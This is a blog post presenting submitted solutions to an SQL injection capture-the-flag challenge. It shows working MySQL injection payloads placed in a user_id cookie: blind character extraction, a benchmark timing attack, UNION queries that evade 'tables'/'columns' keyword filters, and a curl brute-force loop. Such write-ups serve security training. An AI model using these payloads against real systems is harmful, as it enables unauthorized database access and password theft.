Solutions for challenge 2A

Solutions for challenge 2A

Posted on July 12, 2012 by Roberto Salgado

After receiving many submissions for the SQL Injection challenge 2A, I decided it was time to show some of the solutions used to solve this challenge. In case you missed out on the series of SQL Injection challenges I released a few months ago, they are currently still online and available to try out. There are 3 challenges, each with part A and B. Out of all the challenges, challenge 2A ended up being one of the easier ones and since the solutions didn't vary too much, I decided to pick this challenge to be the first to show the solutions to.



DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

What differentiates this challenge from the other challenges is that it allows you to log in as guest. In doing so, a welcome message is displayed showing the username and privileges and the cookie user_id is created. The cookie user_id, as the name says, has the id of the user, which in the case of guest is 1. If the value of the cookie is changed to 0, the message will now display admin as the username with administrator privileges. This is an indication that the username and privileges are determined from the user_id cookie, which is of course pulling that information from the MySQL database. Now that we know the injection point is in the cookie user_id, the next step is to figure out which characters are allowed and which are filtered.

The main idea behind this challenge is to figure out a way to retrieve the table/column names without using information_schema.tables/columns. For this reason, I decided to use very little filtering. Initially I had only blacklisted the following characters:

$blacklist = array('tables', 'columns', '(', ')');

Many WAF's rely on blocking the keywords 'tables' and 'columns', so I wanted to demonstrate that an attacker doesn't need those keywords in order the obtain the table/column names; I later added mysql_real_escape_string() as an extra layer of difficulty. Basically there are several other tables we can obtain the table/column names from other than information_schema.tables/columns, which are the two widely known ones. The only condition is that some require that the table/column have a key, and since each table should have a primary key, chances are high that this will work. Some examples are:





Some of the solutions I received used a method I had not anticipated when writing the challenge. This type of solution guessed the column name and extracted the password through a blind SQLi. In hindsight I should have added a prefix to the column names, so they couldn't be guessed as easily. However, I did learn something because of it: I knew the LIKE statement doesn't require quotations, what I didn't know is that you could use the wildcards % and ? without the quotations. Below are the solutions that were submitted:




Solution omitted as it can be used to solve challenge 2B.

First Category


user_id=0 and username='admin' and mid(password,1,1)='e'

Team Rebel:

user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))


user_id=0 and password LIKE "el%uitas"

NULL Life:

Submitted a PHP script found here.


user_id=0 and username=0x656c25


user_id=-1 OR password LIKE BINARY 0x{chars}25


user_id=0 and password like binary 0x456c25

Submitted a Python script found here.


user_id=0 and password like 0x[blind-here]25


userid=0 and password >= BINARY 0x41


for i in {2,3,4,5}; do for j in {0,1,2,3,4,5,6,7,8,9,0,A,B,C,D,E,F,G} ; do echo $i$j ; curl -b "user_id=0 and password LIKE 0x454C5F564552475549544153${i}${j}25" 2>&1 | grep ADMIN ;done ;done

Second Category

Sebastien Blot:


Miroslav Stampar:

user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3

Paul da Silva:

userid=-1 union select null,COLUMN_NAME,TABLE_NAME,null from information_schema.KEY_COLUMN_USAGE where table_name<>0x7265676c6173 and table_name<>0x72756c6573 limit 0,1-- 




A full list of the victors for each challenge is available here.

Latest Blog Entries

Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.